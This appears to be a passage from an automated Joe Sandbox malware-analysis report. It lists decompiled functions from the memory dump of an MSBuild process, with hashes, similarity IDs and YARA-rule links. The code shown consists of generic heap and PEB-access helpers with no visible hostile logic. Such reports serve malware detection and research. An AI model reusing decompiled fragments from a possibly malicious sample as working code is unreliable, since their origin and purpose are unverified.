                                                                                                • Associated: 00000003.00000002.488171763.000000000119B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.488192191.000000000119F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_1080000_MSBuild.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 21925aaec2e184e0cf3224d37ef5fb547262a2f14b1311ce21bd81d54814825a
                                                                                                • Instruction ID: 127a92d93195157da180f0e109cd5b542a2b3a622b0862669c5b5b11a539c8fc
                                                                                                • Opcode Fuzzy Hash: 21925aaec2e184e0cf3224d37ef5fb547262a2f14b1311ce21bd81d54814825a
                                                                                                • Instruction Fuzzy Hash: D4F01574820B09DECBBCEFA9E50074C36B4F796310F00812A9174A7AEAC73464E4CF01
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0115D380 Relevance: .0, Instructions: 21COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 100%
                                                                                                			E0115D380(void* __ecx, void* __edx, intOrPtr _a4) {
				void* _t5;

				if(_a4 != 0) {
					_t5 = L010AE8B0(__ecx, _a4, 0xfff);
					L010C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
					return _t5;
				}
				return 0xc000000d;
			}




                                                                                                0x0115d38a
                                                                                                0x0115d39b
                                                                                                0x0115d3b1
                                                                                                0x00000000
                                                                                                0x0115d3b6
                                                                                                0x00000000

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.486523240.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                                                                                • Associated: 00000003.00000002.488171763.000000000119B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.488192191.000000000119F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_1080000_MSBuild.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
                                                                                                • Instruction ID: 1ccfd2f465e10f0af96501877aafa908209c9f665bcc464586af711841a09d99
                                                                                                • Opcode Fuzzy Hash: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
                                                                                                • Instruction Fuzzy Hash: CBE0C231284209FBEF265F84DC00FA97B16EB50BA0F104031FE485A691C7719C91DBC4
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 010DA185 Relevance: .0, Instructions: 20COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 100%
                                                                                                			E010DA185() {
				void* __ecx;
				intOrPtr* _t5;

				if( *0x11967e4 >= 0xa) {
					if(_t5 < 0x1196800 || _t5 >= 0x1196900) {
						return L010C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t5);
					} else {
						goto L1;
					}
				} else {
					L1:
					return E010C0010(0x11967e0, _t5);
				}
			}





                                                                                                0x010da190
                                                                                                0x010da1a6
                                                                                                0x010da1c2
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x010da192
                                                                                                0x010da192
                                                                                                0x010da19f
                                                                                                0x010da19f

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.486523240.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                                                                                • Associated: 00000003.00000002.488171763.000000000119B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.488192191.000000000119F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_1080000_MSBuild.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: ebc837048a7fc3b54f4ec6644fc85f98f91e2be97422605885a525af3e98452f
                                                                                                • Instruction ID: f49bbd777eb2fbf529f610c6a1cf0d77d0d9196f34a0bff06daee6d5a57d08e3
                                                                                                • Opcode Fuzzy Hash: ebc837048a7fc3b54f4ec6644fc85f98f91e2be97422605885a525af3e98452f
                                                                                                • Instruction Fuzzy Hash: DED02B712211009ACB2E13208E14BAD3212F780B90F34840CF2A70B5A4EB5098D0D528
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 010D16E0 Relevance: .0, Instructions: 17COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 100%
                                                                                                			E010D16E0(void* __edx, void* __eflags) {
				void* __ecx;
				void* _t3;

				_t3 = E010D1710(0x11967e0);
				if(_t3 == 0) {
					_t6 =  *[fs:0x30];
					if( *((intOrPtr*)( *[fs:0x30] + 0x18)) == 0) {
						goto L1;
					} else {
						return L010C4620(_t6,  *((intOrPtr*)(_t6 + 0x18)), 0, 0x20);
					}
				} else {
					L1:
					return _t3;
				}
			}





                                                                                                0x010d16e8
                                                                                                0x010d16ef
                                                                                                0x010d16f3
                                                                                                0x010d16fe
                                                                                                0x00000000
                                                                                                0x010d1700
                                                                                                0x010d170d
                                                                                                0x010d170d
                                                                                                0x010d16f2
                                                                                                0x010d16f2
                                                                                                0x010d16f2
                                                                                                0x010d16f2

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.486523240.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                                                                                • Associated: 00000003.00000002.488171763.000000000119B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.488192191.000000000119F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_1080000_MSBuild.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: d14983ee73287785c56624a53f83e7b48256cf60e9862edf41ea8a9461bfcd24
                                                                                                • Instruction ID: 5037770ae9945519d560173097497aab928af89a83fa0c9065e797477dc115f6
                                                                                                • Opcode Fuzzy Hash: d14983ee73287785c56624a53f83e7b48256cf60e9862edf41ea8a9461bfcd24
                                                                                                • Instruction Fuzzy Hash: B9D0A771100301A2EE2D5B14AC14B1826A1FF94B81F38009CF247594D0CFB0DC93E458
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 011253CA Relevance: .0, Instructions: 16COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 100%
                                                                                                			E011253CA(void* __ebx) {
				intOrPtr _t7;
				void* _t13;
				void* _t14;
				intOrPtr _t15;
				void* _t16;

				_t13 = __ebx;
				if( *((char*)(_t16 - 0x65)) != 0) {
					E010BEB70(_t14,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					_t7 =  *((intOrPtr*)(_t16 - 0x64));
					_t15 =  *((intOrPtr*)(_t16 - 0x6c));
				}
				if(_t15 != 0) {
					L010C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t13, _t15);
					return  *((intOrPtr*)(_t16 - 0x64));
				}
				return _t7;
			}








                                                                                                0x011253ca
                                                                                                0x011253ce
                                                                                                0x011253d9
                                                                                                0x011253de
                                                                                                0x011253e1
                                                                                                0x011253e1
                                                                                                0x011253e6
                                                                                                0x011253f3
                                                                                                0x00000000
                                                                                                0x011253f8
                                                                                                0x011253fb

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.486523240.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                                                                                • Associated: 00000003.00000002.488171763.000000000119B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.488192191.000000000119F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_1080000_MSBuild.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
                                                                                                • Instruction ID: 8a378e9b5ed86ae4d7b1557c7fbe3f7e0555cc697aee49b5ec62898c797bd0e3
                                                                                                • Opcode Fuzzy Hash: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
                                                                                                • Instruction Fuzzy Hash: 88E08C319046849BCF16DB88C690FCEBBF6FB84B00F140008E0485B620C724AC00CB00
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 010BAAB0 Relevance: .0, Instructions: 12COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 100%
                                                                                                			E010BAAB0() {
				intOrPtr* _t4;

				_t4 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t4 != 0) {
					if( *_t4 == 0) {
						goto L1;
					} else {
						return  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x1e;
					}
				} else {
					L1:
					return 0x7ffe0030;
				}
			}




                                                                                                0x010baab6
                                                                                                0x010baabb
                                                                                                0x0110a442
                                                                                                0x00000000
                                                                                                0x0110a448
                                                                                                0x0110a454
                                                                                                0x0110a454
                                                                                                0x010baac1
                                                                                                0x010baac1
                                                                                                0x010baac6
                                                                                                0x010baac6

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.486523240.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                                                                                • Associated: 00000003.00000002.488171763.000000000119B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.488192191.000000000119F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_1080000_MSBuild.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
                                                                                                • Instruction ID: a0efa2b653302e8f8f7d6cf4d57795c9f307b01eb00bf4385bd950743d010f48
                                                                                                • Opcode Fuzzy Hash: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
                                                                                                • Instruction Fuzzy Hash: 3DD0C939352A80CFD61BCB0CC994B0537A4FB04B40FC504D0E500CB762E72CD944CA00
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 010D35A1 Relevance: .0, Instructions: 12COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 100%
                                                                                                			E010D35A1(void* __eax, void* __ebx, void* __ecx) {
				void* _t6;
				void* _t10;
				void* _t11;

				_t10 = __ecx;
				_t6 = __eax;
				if( *((intOrPtr*)(_t11 - 0x34)) >= 0 && __ebx != 0) {
					 *((intOrPtr*)(__ecx + 0x294)) =  *((intOrPtr*)(__ecx + 0x294)) + 1;
				}
				if( *((char*)(_t11 - 0x1a)) != 0) {
					return E010BEB70(_t10,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
				}
				return _t6;
			}






                                                                                                0x010d35a1
                                                                                                0x010d35a1
                                                                                                0x010d35a5
                                                                                                0x010d35ab
                                                                                                0x010d35ab
                                                                                                0x010d35b5
                                                                                                0x00000000
                                                                                                0x010d35c1
                                                                                                0x010d35b7

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.486523240.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                                                                                • Associated: 00000003.00000002.488171763.000000000119B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.488192191.000000000119F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_1080000_MSBuild.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
                                                                                                • Instruction ID: 2d0aa3dfb4041de321d51f2216bf0701d6472903e8a1e2b30754e7f95e5b1a07
                                                                                                • Opcode Fuzzy Hash: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
                                                                                                • Instruction Fuzzy Hash: DDD0A77140138199DB41AF14C1147ECB7B1BB00204FD8109580C60D45AC3354909C602
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 010ADB40 Relevance: .0, Instructions: 11COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 100%
                                                                                                			E010ADB40() {
				signed int* _t3;
				void* _t5;

				_t3 = L010C4620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x64);
				if(_t3 == 0) {
					return 0;
				} else {
					 *_t3 =  *_t3 | 0x00000400;
					return _t3;
				}
			}





                                                                                                0x010adb4d
                                                                                                0x010adb54
                                                                                                0x010adb5f
                                                                                                0x010adb56
                                                                                                0x010adb56
                                                                                                0x010adb5c
                                                                                                0x010adb5c

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.486523240.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                                                                                • Associated: 00000003.00000002.488171763.000000000119B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.488192191.000000000119F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_1080000_MSBuild.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
                                                                                                • Instruction ID: 066cac220a2c1decdbc1698c65b41d798a85770522a6635408d0faccaaf8a0e6
                                                                                                • Opcode Fuzzy Hash: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
                                                                                                • Instruction Fuzzy Hash: 98C08C30290A01EAEB321F60CD01B403AA0BB10F01F8400A06381DA4F0DBB8D801EA00
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0112A537 Relevance: .0, Instructions: 11COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 100%
                                                                                                			E0112A537(intOrPtr _a4, intOrPtr _a8) {

				return L010C8E10( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a8, _a4);
			}



                                                                                                0x0112a553

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.486523240.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                                                                                • Associated: 00000003.00000002.488171763.000000000119B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.488192191.000000000119F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_1080000_MSBuild.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
                                                                                                • Instruction ID: 21bc34daf305f0bfacf22cd49bbb3c1806345f34fcfd723b063bc1b0cffe3046
                                                                                                • Opcode Fuzzy Hash: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
                                                                                                • Instruction Fuzzy Hash: FDC08C33080248BBCB126F81CC00F4A7F2AFBA4B60F008015FA480B571C632E970EF88
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 010C3A1C Relevance: .0, Instructions: 10COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 100%
                                                                                                			E010C3A1C(intOrPtr _a4) {
				void* _t5;

				return L010C4620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
			}




                                                                                                0x010c3a35

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.486523240.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                                                                                • Associated: 00000003.00000002.488171763.000000000119B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.488192191.000000000119F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_1080000_MSBuild.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
                                                                                                • Instruction ID: df387910a98b819e27ad89bb2777237fb2fb32b94b98979d6d08046e8e76a5b8
                                                                                                • Opcode Fuzzy Hash: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
                                                                                                • Instruction Fuzzy Hash: 46C08C32080248BBC7226F41DC00F057B29E7A4B60F000020B6440A5608572EC60D988
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 010AAD30 Relevance: .0, Instructions: 10COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 100%
                                                                                                			E010AAD30(intOrPtr _a4) {

				return L010C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
			}



                                                                                                0x010aad49

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.486523240.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                                                                                • Associated: 00000003.00000002.488171763.000000000119B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.488192191.000000000119F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_1080000_MSBuild.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
                                                                                                • Instruction ID: 1b759311332e096fa1c964f6771865707d328e41ef1af1f8eaee5625ed824b23
                                                                                                • Opcode Fuzzy Hash: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
                                                                                                • Instruction Fuzzy Hash: EAC08C32080248BBC7126B85CD00F057B29E7A0B60F000020F6040A6618932E860D988
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 010D36CC Relevance: .0, Instructions: 10COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 100%
                                                                                                			E010D36CC(void* __ecx) {

				if(__ecx > 0x7fffffff) {
					return 0;
				} else {
					return L010C4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, __ecx);
				}
			}



                                                                                                0x010d36d2
                                                                                                0x010d36e8
                                                                                                0x010d36d4
                                                                                                0x010d36e5
                                                                                                0x010d36e5

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.486523240.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                                                                                • Associated: 00000003.00000002.488171763.000000000119B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.488192191.000000000119F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_1080000_MSBuild.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
                                                                                                • Instruction ID: ddf581e66096910495e3348555d8eb633a403ccd31a1c9ad013a5f4b2cafa3c4
                                                                                                • Opcode Fuzzy Hash: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
                                                                                                • Instruction Fuzzy Hash: CBC02BB4150440FBD7251F30CD10F1872A4F704E21F6403987360894F0D5689C00D501
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 010B76E2 Relevance: .0, Instructions: 10COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 100%
                                                                                                			E010B76E2(void* __ecx) {
				void* _t5;

				if(__ecx != 0 && ( *(__ecx + 0x20) & 0x00000040) == 0) {
					return L010C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, __ecx);
				}
				return _t5;
			}




                                                                                                0x010b76e4
                                                                                                0x00000000
                                                                                                0x010b76f8
                                                                                                0x010b76fd

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.486523240.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                                                                                • Associated: 00000003.00000002.488171763.000000000119B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.488192191.000000000119F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_1080000_MSBuild.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
                                                                                                • Instruction ID: 8e499bb38cd05c247c788750aa16facde8b276391f253e1a9e9aef2fff7c55ec
                                                                                                • Opcode Fuzzy Hash: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
                                                                                                • Instruction Fuzzy Hash: 3BC08C701411C45AEB2A570CCE64B643A90BB4CA08F4802DCEA810D4E2C368AC02DA08
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 010C7D50 Relevance: .0, Instructions: 7COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 100%
                                                                                                			E010C7D50() {
				intOrPtr* _t3;

				_t3 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t3 != 0) {
					return  *_t3;
				} else {
					return _t3;
				}
			}




                                                                                                0x010c7d56
                                                                                                0x010c7d5b
                                                                                                0x010c7d60
                                                                                                0x010c7d5d
                                                                                                0x010c7d5d
                                                                                                0x010c7d5d

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.486523240.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                                                                                • Associated: 00000003.00000002.488171763.000000000119B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.488192191.000000000119F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_1080000_MSBuild.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
                                                                                                • Instruction ID: 6185d07edfb6cb30cb6abaff70cc07323139bcfb7ae2ade6ce6c94e1417fedbe
                                                                                                • Opcode Fuzzy Hash: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
                                                                                                • Instruction Fuzzy Hash: 75B092353019418FCE96EF18C080B1933F8BB44A40F8400D4E400CBA21D229E8008D00
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 010D2ACB Relevance: .0, Instructions: 5COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 100%
                                                                                                			E010D2ACB() {
				void* _t5;

				return E010BEB70(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
			}




                                                                                                0x010d2adc

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.486523240.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                                                                                • Associated: 00000003.00000002.488171763.000000000119B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.488192191.000000000119F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_1080000_MSBuild.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
                                                                                                • Instruction ID: fbc8c6c9696520a2dc8aeea1936b52b5804831c142c416eaab26309cb229a978
                                                                                                • Opcode Fuzzy Hash: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
                                                                                                • Instruction Fuzzy Hash: 9CB01232C10441CFCF02EF40C650FDA7331FB40750F054490900227930C228AC01CB40
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 010E9950 Relevance: .0, Instructions: 4COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.486523240.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                                                                                • Associated: 00000003.00000002.488171763.000000000119B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.488192191.000000000119F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_1080000_MSBuild.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 5b4e9bd631130e39b35c80447050443637423feb8fda563be52ab071c0748837
                                                                                                • Instruction ID: 7fd4b5f7551f62ce0aca67c6df6eb043e4f45baafb4bd290dfde68346251fa3a
                                                                                                • Opcode Fuzzy Hash: 5b4e9bd631130e39b35c80447050443637423feb8fda563be52ab071c0748837
                                                                                                • Instruction Fuzzy Hash: E99002A120140903D140659988057070105A7D0342F52C015A3454595ECA698C5172B5
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 010E99D0 Relevance: .0, Instructions: 4COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.486523240.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                                                                                • Associated: 00000003.00000002.488171763.000000000119B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.488192191.000000000119F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_1080000_MSBuild.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 403cd99eb56d85fe7a04eb9c20d5edbb3eab7fe5dd4721c0ff8e0c54d1a074b1
                                                                                                • Instruction ID: ee469d93bf1c151504d59076a18ee8302fe4e548ba5791d0042d5834a2d03585
                                                                                                • Opcode Fuzzy Hash: 403cd99eb56d85fe7a04eb9c20d5edbb3eab7fe5dd4721c0ff8e0c54d1a074b1
                                                                                                • Instruction Fuzzy Hash: 589002A121100542D104619984057060145A7E1241F52C016A3544594CC5698C6172A5
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 010E9820 Relevance: .0, Instructions: 4COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.486523240.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                                                                                • Associated: 00000003.00000002.488171763.000000000119B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.488192191.000000000119F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_1080000_MSBuild.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 71aa18a52d9cf014304767b5856095aabdc8da6f241499adad0c07b5b93ba118
                                                                                                • Instruction ID: 1a7f0b1c013e2f3bdc41493ce7b405f880d2ccaec1177fc392c5ca81e27c2484
                                                                                                • Opcode Fuzzy Hash: 71aa18a52d9cf014304767b5856095aabdc8da6f241499adad0c07b5b93ba118
                                                                                                • Instruction Fuzzy Hash: 2990027124100902D141719984057060109B7D0281F92C016A1814594EC6958A56BBE1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 010EB040 Relevance: .0, Instructions: 4COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.486523240.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                                                                                • Associated: 00000003.00000002.488171763.000000000119B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.488192191.000000000119F000.00000040.00000800.00020000.00000000.sdmpDownload File
